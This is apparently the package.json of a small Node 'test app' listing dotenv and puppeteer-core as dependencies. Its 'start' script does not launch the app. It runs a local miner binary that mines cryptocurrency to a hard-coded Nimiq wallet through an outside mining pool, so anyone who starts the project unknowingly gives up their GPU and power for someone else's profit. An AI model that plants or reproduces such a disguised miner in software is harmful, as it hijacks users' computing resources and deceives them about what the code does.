{
  "name": "node-test-app",
  "version": "1.2.0",
  "description": "Node test app",
  "author": "adafycheng",
  "license": "MIT",
  "private": true,
  "engines": {
    "node": "16.14.2"
  },
  "dependencies": {
    "dotenv": "^16.3.1",
    "puppeteer-core": "^20.2.1"
  },
  "scripts": {
    "start": "./miner --wallet-address='NQ08 SUEH T0GS PCDJ HUNX Q50H B0M0 ABHA PP03' --pool='pool.nimiq.watch:8443' --deviceLabel='rtx-3090' --protocol='dumb' --miner='2'"
  }
}
